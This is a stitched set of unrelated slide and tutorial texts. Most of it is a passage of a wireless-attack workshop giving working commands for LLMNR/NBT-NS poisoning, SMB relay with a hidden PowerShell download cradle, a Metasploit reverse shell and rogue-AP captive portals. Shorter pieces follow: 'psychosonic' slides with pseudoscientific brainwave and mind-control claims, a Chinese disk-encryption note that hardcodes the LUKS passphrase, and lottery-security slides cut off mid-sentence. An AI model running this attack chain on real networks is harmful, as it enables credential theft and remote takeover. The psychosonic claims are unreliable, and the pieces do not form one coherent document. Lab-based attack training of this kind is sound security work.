LLMNR broadcast request to all IPs on the same subnet. Finally, if the LLMNR request fails, the Windows computer makes a last ditch attempt at resolving the hostname by making a NBT-NS broadcast request to all hosts on the same subnet [12][13]. For the purposes of this tutorial, we can think of LLMNR and NBT-NS as two services that serve the same logical functionality. To understand how these protocols work, we’ll use an example. Suppose we have two computers with NetBIOS hostnames Alice and Leeroy. Alice wants to request a file from Leeroy over SMB, but doesn’t know Leeroy’s IP address. After attempting to resolve Leeroy’s IP address locally and using DNS, Alice makes a broadcast request using LLMNR or NBT-NS (the effect is the same). Every computer on the same subnet as Alice receives this request, including Leeroy. Leeroy responds to Alice’s request with its IP, while every other computer on the subnet ignores Alice’s request [12][13]. What happens if Alice gets two responses? Simple: the first response is the one that is considered valid. This creates a race condition that can be exploited by an attacker. All the attacker must do is wait for an LLMNR or NBT-NS request, then attempt to send a response before the victim receives a legitimate one. If the attack is successful, the victim sends traffic to the attacker. Given that NetBIOS name resolution is used extensively for things such as remote login and accessing SMB shares, the traffic sent to the attacker often contains password hashes [14]. Let’s perform a simple LLMNR/NBT-NS poisoning attack. To do this, we’ll be using a tool called Responder. Start by booting up your Windows AD Victim and Kali virtual machines. From your Kali virtual machine, open a terminal and run the following command: root@localhost~# responder -I eth0 –wf Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 29 This will tell Responder to listen for LLMNR/NBT-NS broadcast queries. Next, use your Windows AD Victim to attempt to access a share from a nonexistent hostname such as the one shown in the screenshot below. Using a nonexistent hostname forces the Windows machine to broadcast an LLMNR/NBT-NS request. Responder will then issue a response, causing the victim to attempt to authenticate with the Kali machine. The results are shown in the screenshot below. Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 30 Lab Exercise: LLMNR/NBT-NS Poisoning Practice using Responder to perform LLMNR/NBT-NS poisoning attacks. Experiment with the Responder’s different command line options. SMB Relay Attacks With impacket NTLM is a relatively simple authentication protocol that relies on a challenge/response mechanism. When a client attempts to authenticate using NTLM, the server issues it a challenge in the form of a string of characters. The client then encrypts challenge using its password hash and sends it back to the server as an NTLM response. The server then attempts to decrypt this response using the user’s password hash. If the decrypted response is identical the plaintext challenge, then the user is authenticated [15]. In an SMB Relay attack, the attacker places him or herself in a position on the network where he or she can view NTLM traffic as it is transmitted across the wire. Man-in-the-middle attacks are often used to facilitate this. The attacker then waits for a client to attempt to authenticate with the target server. When the client begins the authentication process, the attacker relays the authentication attempt to the target. This causes the target server to issue an NTLM challenge back to the attacker, which the attacker relays back to the client. The client receives the NTLM challenge, encrypts it, and sends the NTLM response back to the attacker. The attacker then relays this response back to the target server. The server receives the response, and the attacker becomes authenticated with the target. Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 31 System administrators often use automated scripts to perform maintenance tasks on the network at regularly scheduled intervals. These scripts often use service accounts that have administrative privileges, and use NTLM for remote authentication. This makes them prime candidates for both SMB Relay attacks and the poisoning attacks that we learned about in the last section. Ironically, many types of security related hardware and software authenticate this way as well, including antivirus programs and agentless network access control mechanisms. This attack can be mitigated using a technique known as SMB signing, in which packets are digitally signed to confirm their authenticity and point of origin [16]. Most modern Windows operating systems are capable of using SMB signing, although only Domain Controllers have it enabled by default [16]. The impacket toolkit contains an excellent script for performing this type of attack. It’s reliable, flexible, and best of all supports attacks against NTLMv2. Let’s perform a simple SMB Relay attack using impacket’s smbrelayx script. Before we begin, boot up your Kali VM, Windows DC VM, and your Windows AD Victim VM. On your Windows DC VM, type the following command in your PowerShell prompt to obtain its IP address. Do the same on your Windows AD Victim VM to obtain its IP address. Once you have the IP addresses of both the Windows AD Victim and Windows DC VMs, open a terminal on your Kali VM and run ifconfig to obtain your IP address. PS C:\> ipconfig root@localhost~# ifconfig Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 32 On your Kali VM, change directories into /opt/impacket/examples and use the following command to start the smbrelayx script. In the command below, make sure you change the IP address to the right of the -h flag to the IP address of your Windows AD Victim virtual machine. Similarly, change the second IP address to the IP address of your Kali virtual machine. Notice how we pass a Powershell command to run on the targeted machine using the -c flag. The Powershell command bypasses the Windows AD Victim VM’s execution policies and launches a reverse shell downloaded from your Kali virtual machine. Once the payload has been generated, use the following commands within metasploit to launch a server from which to download the reverse shell. As before, change the IP address shown below to the IP address of your Kali virtual machine. The traditional way to perform this attack is to establish a man-in-the-middle with which to intercept an NTLM exchange. However, we can also perform an SMB Relay attack using the LLMNR/NBT-NS poisoning techniques we learned in the last section. To do this, we simply launch responder on our Kali machine as we did before. With responder running, we just need to perform an action on the Windows DC virtual machine that will trigger an NTLM exchange. An easy way to do this is by attempting to access a non- existent SMB share from the Windows DC machine as shown in the screenshot below. root@localhost~# python smbrelayx.py -h 172.16.15.189 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://172.16.15.186:8080')" msf > use exploit/multi/script/web_delivery msf (web_delivery) > set payload windows/meterpreter/reverse_tcp msf (web_delivery) > set TARGET 2 msf (web_delivery) > set LHOST 172.16.15.186 msf (web_delivery) > set URIPATH / msf (web_delivery) > exploit root@localhost~# responder -I eth0 -wrf Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 33 You should now see three things happen on your Kali VM. First, you’ll see Responder send a poisoned answer to your Windows DC virtual machine for the NetBIOS name of the non-existent server. Next, you’ll see impacket successfully execute an SMB Relay attack against the Windows AD Victim machine. Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 34 Finally, you’ll see Metasploit deliver a payload to the Windows AD Victim machine, giving you a shell. Lab Exercise: SMB Relay Attacks Practice using impacket to perform SMB Relay attacks against your Windows AD Victim VM and your Windows DC VM. This time, perform the attack using the Empire Powershell framework by following the steps outlined at the following URL: ▪ https://github.com/s0lst1c3/awae/blob/master/lab6/instructions.txt You can find the Empire framework, as well as a copy of the instructions referenced above, within your home directory on the Kali VM. As your practice this attack, you may notice that it is ineffective against the domain controller. This is because domain controllers have a protection called SMB signing enabled by default that makes SMB Relay attacks impossible. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 35 Firewall And NAC Evasion Using Indirect Wireless Pivots Chapter Overview In Wireless Man-In-The-Middle Attacks, we configured our Linux operating system to act as a wireless router. This allowed us to bridge traffic between our rogue access point and an upstream network interface, which enabled us to manipulate traffic. In this section, we’re going to learn a no-upstream attack that can be used to pivot from one segregated VLAN to another, bypassing firewall and NAC mechanisms in the process. Before we learn how to do this, however, we’ll need to learn how to configure Linux as a captive portal. Configuring Linux As A Captive Portal There are multiple ways to configure Linux to act as a captive portal. The most straightforward method of doing this is by running our own DNS server that resolves all queries to the IP address of our rogue access point. Recall that in Wireless Man-In-The-Middle Attacks, we created a DHCP configuration file with the following options. We can modify this configuration so that the IP of our external wireless interface is specified as the network’s primary DNS server using a DHCP Option, as shown below. We then start dnsspoof as our nameserver, configuring it to resolve all DNS queries to our access point’s IP. # define DHCP pool dhcp-range=10.0.0.80,10.0.0.254,6h # set Google as nameserver dhcp-option=6,8.8.8.8 # set rogue AP as Gateway dhcp-option=3,10.0.0.1 #Gateway dhcp-authoritative log-queries # define DHCP pool dhcp-range=10.0.0.80,10.0.0.254,6h # set phy as nameserver dhcp-option=6,10.0.0.1 # set rogue AP as Gateway dhcp-option=3,10.0.0.1 #Gateway dhcp-authoritative log-queries Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 36 This is a reasonably effective approach, as it allows us to respond to DNS queries in any way that we want. However, it still has a number of weaknesses. For one thing, wireless devices that connect to our rogue access point may choose to ignore the DHCP Option, selecting a nameserver manually instead. To prevent this from occurring, we can simply redirect any DNS traffic to our DNS server using iptables. Another problem with our current approach is that it does not account for the fact that most operating systems use a DNS cache to avoid having to make DNS lookups repeatedly. The domain names of the victim’s most frequently visited websites are likely to be in this cache. This means that our captive portal will fail in most situations until each of the entries in the cache expire. Additionally, our current approach will fail to capture HTTP requests that do not make use of DNS. To deal with these issues, we can simply redirect all HTTP traffic to our own HTTP server. We can incorporate these techniques into a bash script similar to the one we wrote in Wireless Man-In-The-Middle Attacks. Notice how we start Apache2 to serve content from /var/www/html. root@localhost~# echo ’10.0.0.1’ > dnsspoof.conf root@localhost~# dnsspoof –i wlan0 -f ./dnsspoof.conf root@localhost~# iptables --table nat --append PREROUTING --protocol udp - -destination-port 53 --jump REDIRECT --to-port 53 root@localhost~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 80 --jump REDIRECT --to-port 80 root@localhost~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 443 --jump REDIRECT --to-port 443 Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 37 phy=wlan0 channel=1 bssid=00:11:22:33:44:00 essid=FREE_WIFI # kill interfering processes service network-manager stop nmcli radio wifi off rfkill unblock wlan ifconfig wlan0 up echo “interface=$phy” > hostapd.conf “driver=nl80211” >> hostapd.conf “ssid=$essid” >> hostapd.conf bssid=$bssid” >> hostapd.conf “channel=$channel” >> hostapd.conf “hw_mode=g” >> hostapd.conf hostapd ./hostapd ifconfig $phy 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 echo "# define DHCP pool" > dnsmasq.conf echo "dhcp-range=10.0.0.80,10.0.0.254,6h" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "# set phy as nameserver" >> dnsmasq.conf echo "dhcp-option=6,10.0.0.1" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "# set rogue AP as Gateway" >> dnsmasq.conf echo "dhcp-option=3,10.0.0.1 #Gateway" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "dhcp-authoritative" >> dnsmasq.conf echo "log-queries" >> dnsmasq.conf dnsmasq -C ./dnsmasq.conf & echo ’10.0.0.1’ > dnsspoof.conf dnsspoof –i $phy -f ./dnsspoof.conf systemctl start apache2 echo ‘1’ > /proc/sys/net/ipv4/ip_forward iptables --policy INPUT ACCEPT iptables --policy FORWARD ACCEPT iptables --policy OUTPUT ACCEPT iptables --flush iptables --table nat --flush iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53 iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 80 iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 443 read -p ‘Press enter to quit…’ # kill daemon processes for i in `pgrep dnsmasq`; do kill $i; done for i in `pgrep hostapd`; do kill $i; done for i in `pgrep dnsspoof`; do kill $i; done for i in `pgrep apache2`; do kill $i; done # restore iptables iptables --flush iptables --table nat –flush Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 38 Lab Exercise: Captive Portal Use your Kali VM to run the bash script that we wrote in this section to create a captive portal. Connect to the captive portal using your Windows AD Victim virtual machine. From your Kali VM, notice the terminal output from dnsspoof that shows DNS queries being resolved to 10.0.0.1. From your Windows AD Victim virtual machine, observe how all traffic is redirected to an html page served by your Kali VM. Additionally, follow the instructions found at the following URL to create a captive portal using EAPHammer: ▪ https://github.com/s0lst1c3/awae/blob/master/lab7/instructions.txt Wireless Theory: Hostile Portal Attacks Consider a scenario in which we have breached the perimeter of a wireless network that is used to provide access to sensitive internal resources. The sensitive resources are located on a restricted VLAN, which is not accessible from the sandboxed VLAN on which we are currently located. An authorized wireless device is currently connected to the wireless network as well, but is located on the restricted VLAN. We can combine several of the attacks learned in this workshop to pivot into the restricted VLAN through the authorized device, even though we are located on a separate VLAN. To do this, we first force an authorized device to connect to us using an Evil Twin attack. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 39 Once the workstation is connected to our rogue access point, we can redirect all HTTP and DNS traffic to our wireless interface as we did with our captive portal. However, instead configuring our portal’s HTTP server to merely serve a static HTML page, we configure it to redirect all HTTP traffic to an SMB share located on a non-existent server. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 40 The result is that our victims are forced to resolve the SMB server’s hostname using either NBT- NS or LLMNR. This allows us to perform an LLMNR/NBT-NS poisoning attack, causing the victim to send us a username and password hash. The hash can be cracked offline to obtain a set of Active Directory credentials, which can then be used to pivot back into the Victim. This is called a hostile portal attack. Although hostile portal attacks are a fast way to steal Active Directory credentials, they aren’t a perfect solution to pivoting out of our sandbox. The reason for this is that password cracking is a time consuming process, even with powerful hardware. A more efficient approach is to ensnare multiple authorized endpoints using an Evil Twin attack, as shown in the diagram below. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 41 Next, we use a Redirect to SMB attack as before to force Victim B (in the diagram above) to initiate NTLM authentication with the attacker. However, instead of merely capturing the NTLM hashes as before, we instead perform an SMB Relay attack from Victim B to Victim A. This gives us remote code execution on Victim A. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 42 We use the SMB Relay attack to place a timed payload on Victim A, then kill our access point to allow both victims to connect back to the target network. The timed payload could be a scheduled task that sends a reverse shell back to our machine, allowing us to pivot from one VLAN to the other. Since both victims are authorized endpoints, they are placed back on the restricted VLAN when they reassociate with the target network. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 43 Once this happens, the attacker simply waits for the scheduled reverse shell from Victim A. Once the attacker receives the reverse shell, he or she pivots from the quarantine VLAN to the restricted VLAN. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 44 Wireless Redirect To SMB With LLMNR And NBT-NS Poisoning The attacks described in the previous section offer us a number of advantages. For one thing, they make the traditional LLMNR/NBT-NS poisoning attack more effective. LLMNR/NBT-NS Poisoning is a somewhat passive attack, which can prove to be a limitation. The attacker must either wait for a broadcast LLMNR/NBT-NS request to appear on the network, or trick a user into clicking a URL beginning with the world “file://”. By chaining LLMNR/NBT-NS poisoning with both an Evil Twin attack and a Redirect to SMB attack, the attacker can get meaningful results faster by actively engaging a target. We already know how LLMNR/NBT-NS poisoning works, so let’s talk about Redirect to SMB instead. In a Redirect to SMB attack, the attacker first creates an HTTP server that responds to all requests with a 302 redirect to an SMB share located on the attacker’s server. The attacker then uses a man-in-the-middle attack to force all of the victim’s HTTP(S) traffic to the malicious HTTP Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 45 server. When the victim attempts to access any web content, the malicious HTTP server issues the 302 redirect. This causes the victim to attempt to authenticate with the attacker in order to authenticate with the SMB share [17]. In our variation of the attack, we redirect the victim to an SMB share on a nonexistent system. This causes the victim to perform a NetBIOS lookup for a system that doesn’t exist. Consequently, the victim broadcasts either an LLMNR or NBT-NS request, allowing the attacker to steal the victim’s NTLM hash. Lab Exercise: Wireless Redirect To SMB With LLMNR/NBT-NS Poisoning With the theory out of the way, let’s pivot into a wireless client using the full Wireless Redirect to SMB With LLMNR/NBT-NS Poisoning attack. The eaphammer tool we used in Evil Twin Attack Using Hostapd-WPE can also be used for this purpose. Before we begin, create an open network using your wireless router. Then connect your Windows AD Victim virtual machine to the open network you just created. Next, use eaphammer to launch the attack from your Kali virtual machine. This will force the victim to connect to our access point, allowing us to pivot into the victim using an SMB Relay attack. root@localhost~# python eaphammer.py --interface wlan0 --essid FREE_WIFI - c 1 --auth peap --wpa 2 --hostile-portal Advanced Wireless Attacks Against Enterprise Networks Conclusion © 2017 Gabriel Ryan All Rights Reserved 46 Conclusion You should now have solid understanding of how to perform effective man-in-the-middle attacks without disrupting network resources. We also learned how to identify in-scope EAP networks and breach them using evil twin attacks. We even learned some network attacks that can be used against Active Directory environments, and demonstrated how to use wireless as a means of pivoting between segregated VLANs to bypass firewalls and NAC systems. The material covered in this course code is just the beginning. For additional reading, I highly recommend checking out the resources included in the resource section below. I also recommend reading about Karma attacks and the work of researchers such as Dino Dai Zovi and Dominic White. Finally, spend some time thinking about how these attacks could be used against your organization’s network, and what you could do to stop them. Advanced Wireless Attacks Against Enterprise Networks Resources © 2017 Gabriel Ryan All Rights Reserved 47 Resources [1] "Airbase-ng [Aircrack-ng]," in aircrack-ng.org, 2010. [Online]. Available: https://www.aircrack-ng.org/doku.php?id=airbase-ng. Accessed: Feb. 24, 2017. [2] P. Funk, S. Blake-Wilson, and rfcmarkup version 1, "Extensible authentication protocol tunneled transport layer security Authenticated protocol version 0 (EAP-TTLSv0)," 2008. [Online]. Available: https://tools.ietf.org/html/rfc5281. Accessed: Feb. 24, 2017. [3] J. R. Vollbrecht, B. Aboba, L. J. Blunk, H. Levkowetz, J. Carlson, and rfcmarkup version 1, "Extensible authentication protocol (EAP)," 2004. [Online]. Available: https://tools.ietf.org/html/rfc3748. Accessed: Feb. 24, 2017. [4] J. Wright and J. Cache, "Hacking exposed wireless," McGraw-Hill Education Group, 2015. [Online]. Available: http://dl.acm.org/citation.cfm?id=2825917. Accessed: Feb. 24, 2017. [5] J. Wright and B. Antoniewicz, "PEAP: Pwnd Extensible Authentication Protocol," in ShmooCon, 2008. [6] M. Marlinspike, "Moxie Marlinspike >> software >> sslstrip," in thoughtcrime.org, 2012. [Online]. Available: https://moxie.org/software/sslstrip/. Accessed: Feb. 24, 2017. [7] Red Hat, Inc, "Chapter 17. iptables," in Red Hat Enterprise Linux 3: Reference Guide, 2003. [Online]. Available: https://access.redhat.com/documentation/en- US/Red_Hat_Enterprise_Linux/3/html/Reference_Guide/ch-iptables.html. Accessed: Feb. 24, 2017. [8] "iptables(8) - Linux man page," in linux.die.net. [Online]. Available: https://linux.die.net/man/8/iptables. Accessed: Feb. 24, 2017. [9] Mozilla Developer Network, "Strict-transport-security," in developer.mozilla.org, Mozilla Developer Network, 2016. [Online]. Available: https://developer.mozilla.org/en- US/docs/Web/HTTP/Headers/Strict-Transport-Security. Accessed: Feb. 24, 2017. [10] D. Keeler, "Preloading HSTS," Mozilla Security Blog, 2012. [Online]. Available: https://blog.mozilla.org/security/2012/11/01/preloading-hsts/. Accessed: Feb. 24, 2017. [11] L. Nve Egea, "OFFENSIVE: Exploiting changes on DNS server configuration," in Blackhat Asia, 2014. [Online]. Available: https://www.blackhat.com/docs/asia-14/materials/Nve/Asia-14- Nve-Offensive-Exploiting-DNS-Servers-Changes.pdf. Accessed: Feb. 24, 2017. Advanced Wireless Attacks Against Enterprise Networks Resources © 2017 Gabriel Ryan All Rights Reserved 48 [12] Protocol standard for a NetBIOS service on a TCP/UDP transport: Concepts and methods. NetBIOS Working Group in the Defense Advanced Research Projects Agency, Internet Activities Board, End-to-End Services Task Force. March 1987. (Format: TXT=158437 bytes) (Also STD0019) (Status: INTERNET STANDARD) (DOI: 10.17487/RFC1001) [13] Protocol standard for a NetBIOS service on a TCP/UDP transport: Detailed specifications. NetBIOS Working Group in the Defense Advanced Research Projects Agency, Internet Activities Board, End-to-End Services Task Force. March 1987. (Format: TXT=170262 bytes) (Also STD0019) (Status: INTERNET STANDARD) (DOI:10.17487/RFC1002) [14] L. Gaffié, "Laurent Gaffié," Trustwave, 2017. [Online]. Available: https://www.trustwave.com/Resources/SpiderLabs-Blog/Responder-2-0---Owning-Windows- Networks-part-3/. Accessed: Feb. 24, 2017. [15] Microsoft, "Microsoft NTLM," 2017. [Online]. Available: https://msdn.microsoft.com/en- us/library/windows/desktop/aa378749(v=vs.85).aspx. Accessed: Feb. 24, 2017. [16] J. Barreto, "The basics of SMB signing (covering both SMB1 and SMB2)," Jose Barreto’s Blog, 2010. [Online]. Available: https://blogs.technet.microsoft.com/josebda/2010/12/01/the- basics-of-smb-signing-covering-both-smb1-and-smb2/. Accessed: Feb. 24, 2017. [17] "SPEAR: Redirect to SMB," 2015. [Online]. Available: https://www.cylance.com/redirect-to- smb. Accessed: Feb. 24, 2017. [18] "Eduroam US - global Wi-Fi roaming for academia,". [Online]. Available: https://www.eduroam.us/node/10. Accessed: Feb. 24, 2017. [19] M. Jahoda et al., "Red Hat Enterprise Linux 6.9 Beta Security Guide," 2016. [Online]. Available: https://access.redhat.com/documentation/en- US/Red_Hat_Enterprise_Linux/6/html-single/Security_Guide/index.html#sect-Security_Guide- Firewalls-FORWARD_and_NAT_Rules. Accessed: Feb. 24, 2017. [20] Microsoft, "Message Flow for Basic NTLM Authentication," in MSDN. [Online]. Available: https://msdn.microsoft.com/en-us/library/cc239684.aspx. Accessed: Feb. 24, 2017. [21] "SMB relay: How we leverage it and how you can stop us," TAGI.WIKI, 2015. [Online]. Available: http://www.tagi.wiki/advisories/smb-relay-how-we-leverage-it-and-how-you-can- stop-us. Accessed: Feb. 24, 2017. [22] S. Chaudhary, "Evil twin Tutorial," Kali Linux Hacking Tutorials, 2014. [Online]. Available: http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html. Accessed: Feb. 24, 2017.
pdf
Weaponizing Lady GaGa PsychoSonic Attacks Brad (theNURSE) Smith Private Practice Informatics Nurse What the heck is PsychoSonics? • Sounds that effect the Brain • “Harmonize” with brain • Not NLP, Yes SE Heinrich Wilhelm Dove • Binary beats founder • One for the first Climatologist • Binaural, Monaural, and Isochronic Physiology of PS Music 'nurtures' premature Babies • A Canadian team found music reduced pain and encouraged better oral feeding. http://news.bbc.co.uk/2/hi/health/8068749.stm Frequency Wave Produces 40Hz > Gamma Insight, Ah Ha moment 13 to 40 Hz Beta Active, busy or anxious thinking and active concentration 8 to 13 Hz Alpha Relaxation (while awake) 4 to 7 Hz Theta Dreams, deep meditation, hypnosis < 4 Hz Delta Deep dreamless sleep Military Uses Hx of PS Japanese Sonic Tuba Vietnam War C47 with Loudspeakers • • LRAD can put the “word of God” into their heads. If God, in the form of a voice that only you can hear, tells you to surrender, or run away, what are you gonna do? Ghosts • … the showing was 18.98 hertz--the exact frequency at which a human eyeball starts resonating. • www.physicsroom.com.nz The Urban Funk Campaign Wandering Soul recordings of eerie sounds said to represent the souls of the dead were played at night to spook the superstitious enemy. Problems • Gitmo: played Neil Diamond “Coming to America” • Binyam Mohamed forced to listen to Eminem and Dr Drs for 20 days Top 10 Sonic torture songs 1. White America – Eminem. 2. Barney theme song. 3. Enter Sandman – Mettalica. 4. Hells Bells – AC/DC. 5. Stayin Alive – Bee Gees. 6. Dirrty – Christina Aguilera. 7. America – Neil Diamond. 8. Bulls on Parade – Rage Against the Machine. 9. American Pie – Don McLean. 10. Bodies – Drowning pool Mosquito speaker • Either set the device to 17KHz to disperse groups of troublesome teenagers OR set it to 8 KHz to disperse people of any age Does Vegas do PS? • How many think Vegas uses psychosonics on the casino floor? • The sound of slot machines? Creating weapons of Mass GaGa Her Arsenal is Mighty Lady Gaga: Puppet of Illuminati Mind Control By MAX FISHER on March 16, 2010 LADY GAGA, MICHAEL JACKSON: PUPPETS OF THE ILLUMINATI! How to • Make psychosonic file •Frequency determines “mood” • Embed into MP3 • Best with headphones Frequency Wave Produces 40Hz > Gamma Insight, Ah Ha moment 13 to 40 Hz Beta Active, busy or anxious thinking and active concentration 8 to 13 Hz Alpha Relaxation (while awake) 4 to 7 Hz Theta Dreams, deep meditation, hypnosis < 4 Hz Delta Deep dreamless sleep Software • Gnaural • BrainStimPro Binaural Brainwave Generator • Audacity / Lame • Binaural Gnaural Audacity PreMade Examples Further Help • Gnaural / Binaural • www.psywarrior.com • www.selfdefenseproducts.com • www.unexplainable.net • http://pantheon.yale.edu/~bbl2/Gn auralExampleFiles.html Review • Tones effect your brain • Lower tones “sync” with moods • Longer is better • Samples on DVD Future Work • Do current songs use this? • Prove Vegas uses it! • Phone Vomit • Suggestions? Thanks!! • Let me know how this info works for You. • Always into sound. theNURSE@CyberInfoSec.com
pdf
Linux 全盘加密 看了橙子酱大佬的加密分区解密让我想起了我之前做过 Linux 的全盘加密。 特此分享一下思路。。。。 1. 首先安装系统选择 /(根)分区加密。 就 3 个分区。一个 swap 一个 boot 一个根分区(加密,密码自定义) 其余都正常安装,就拿 centos6.9 举例。 2.进入系统,打开/usr/share/dracut/modules.d/90crypt/目录(看了说明文档找到的) 修改 cryptroot-ask.sh 把 108-112 行加上“#”注释,然后增加一行(如图) echo "password" | cryptsetup luksOpen -T1 "$device" "$luksname" 其中的 password 是 luks 分区需要加密时候要输入的密码 如果不做这个修改,每次启动的时候都要手动输入一次根分区的密码。通过修改这个脚本可 以让系统启动的时候自动输入你设置的 luks 密码。 保存修改,运行 dracut --force 重新生成 initrd 镜像 原本到这里 luks 全盘加密,开机自动输入密码已经 ok,但是 grub 还是有机会被人编辑从 而直接跳过 root 密码。 如果不考虑 grub 到问题,全盘加密自动输入密码到此结束了。 只能再次设置障碍。 /dev/mapper/ 名字自己改一下 比如说 dbaroot(自定义) 对应的 Grub.conf 也一起修改。 Grub.conf 最后的 rhgb quiet 不用删 保存修改,运行 dracut --force 重新生成 initrd 镜像(这是第二次 dracut,其实第一次可以不用 gracut 的) 这里可以修改 init 和 kennel 的名字 改成 md5 之类的 到这里可以重启一下检查一下刚修改的是否 ok 关键在于 grub 所以重新安装 grub rpm 编译环境需要一摸一样的 grub.conf, 我用的 grub-0.97-99.el6 其他安装步骤都一样 唯一不同的在于 我把/boot/grub/grub.conf 这个配置文件给一起编译进 去了。 修改一下源码,多一个参数 --enable-preset-menu=/boot/grub/grub.conf ./configure --enable-preset-menu=/boot/grub/grub.conf (./configure --host=x86_64-redhat-linux-gnu --build=x86_64-redhat-linux-gnu --program- prefix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin -- sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include --libdir=/usr/lib64 -- libexecdir=/usr/libexec --localstatedir=/var --sharedstatedir=/var/lib --mandir=/usr/share/man --infodir=/usr/share/info --sbindir=/sbin --disable-auto-linux-mem-opt -- datarootdir=/usr/share --enable-preset-menu=/boot/grub/grub.conf) 生成的文件 /root/rpmbuild/RPMS/x86_64/grub-0.97-99.el6.x86_64.rpm rpm -ivh ***.rpm grub-install /dev/sda 最后把 boot/grub/grub.conf 删掉。。。。。 重启系统。一切 ok。保护好你的 root 密码。。。
pdf
Backdooring the Lottery and Other Security Tales from Gaming July 30, 2017 Gus Fritschie and Evan Teitelman Presentation Overview 1. Introductions 2. What has happened since 2011 3. Historical overview of security incidents in gaming 4. Eddie Tipton and the lottery 5. Russian slot attacks 6. Conclusion © SeNet International Corp. 2017 3 July 2017 SeNet Who We Are – SeNet International © SeNet International Corp. 2017 4 July 2017 SeNet Who We Are – Gus Fritschie Gus Fritschie has been involved in information security since 2000. About 5 years ago (after his previous DEF CON presentation on iGaming security) he transitioned a significant portion of his practice into the gaming sector. Since then he has established himself and SeNet as the IT security leader in gaming. He has supported a number of clients across the gaming spectrum from iGaming operators, land-based casinos, gaming manufacturer, lotteries, tribal gaming, and daily fantasy sports. @gfritschie © SeNet International Corp. 2017 5 July 2017 SeNet Who We Are – Evan Teitelman Evan works and lives in the Washington DC area. He is the founder and lead developer of BlackArch Linux and specializes in reverse engineering and secure application development. In his free time he enjoys hiking, climbing, and working on his van. © SeNet International Corp. 2017 6 July 2017 SeNet What this talk is and is not © SeNet International Corp. 2017 7 July 2017 SeNet What has happened since 2011 © SeNet International Corp. 2017 8 July 2017 SeNet iGaming Legislation © SeNet International Corp. 2017 9 July 2017 SeNet Highlighted Security Incidents in Gaming Since 2011 None of these will be discussed in detail but are listed to illustrate that this sector is not immune to these threats. Only a small sampling. • Las Vegas Sands hack • NJ iGaming DDOS attacks • Affinity Gaming breach • Hard Rock Hotel & Casino data breach • Casino Rama Resort in Ontario • Peppermill Resort Spa Casino in Reno credit card breach • Weaknesses in Daily Fantasy Sports (DFS) protections © SeNet International Corp. 2017 10 July 2017 SeNet Las Vegas Sands © SeNet International Corp. 2017 11 July 2017 SeNet History Class © SeNet International Corp. 2017 12 July 2017 SeNet Early attacks against slot machines © SeNet International Corp. 2017 13 July 2017 SeNet Early attacks against slot machines (Cont.) Shaved, fake coins and yo-yoing Banknote validators © SeNet International Corp. 2017 14 July 2017 SeNet Early attacks against slot machines (Cont.) Tommy Carmichael Monkey Paw, a taut string attached to a bent metal rod. This rod was jammed into the machine via the air vent and was used to fish around for the switch that released the coin hopper. Once the switch was activated, money was released! This contraption took advantage of the fact that new machines used optical sensors to detect the number of coins dispensed. By blinding the optical sensor, the Light Wand made it impossible for the machine to know how much money it was releasing. Therefore, a player equipped with a Light Wand only had to play until a small jackpot was hit; it was then a matter of inserting the wand and turning a small payout into a mountain of money. © SeNet International Corp. 2017 15 July 2017 SeNet 1980 Pennsylvania Lottery scandal April 24th 1980 the lottery reaches its liability limits on the Daily Number (3-digit game) on 8 of the possible combinations of 6s and 4s (444, 446, 464, 644, 646, 664, 666) Winning number was 666. Later in the evening rumors surfacing that illegal bookmakers were not paying. When 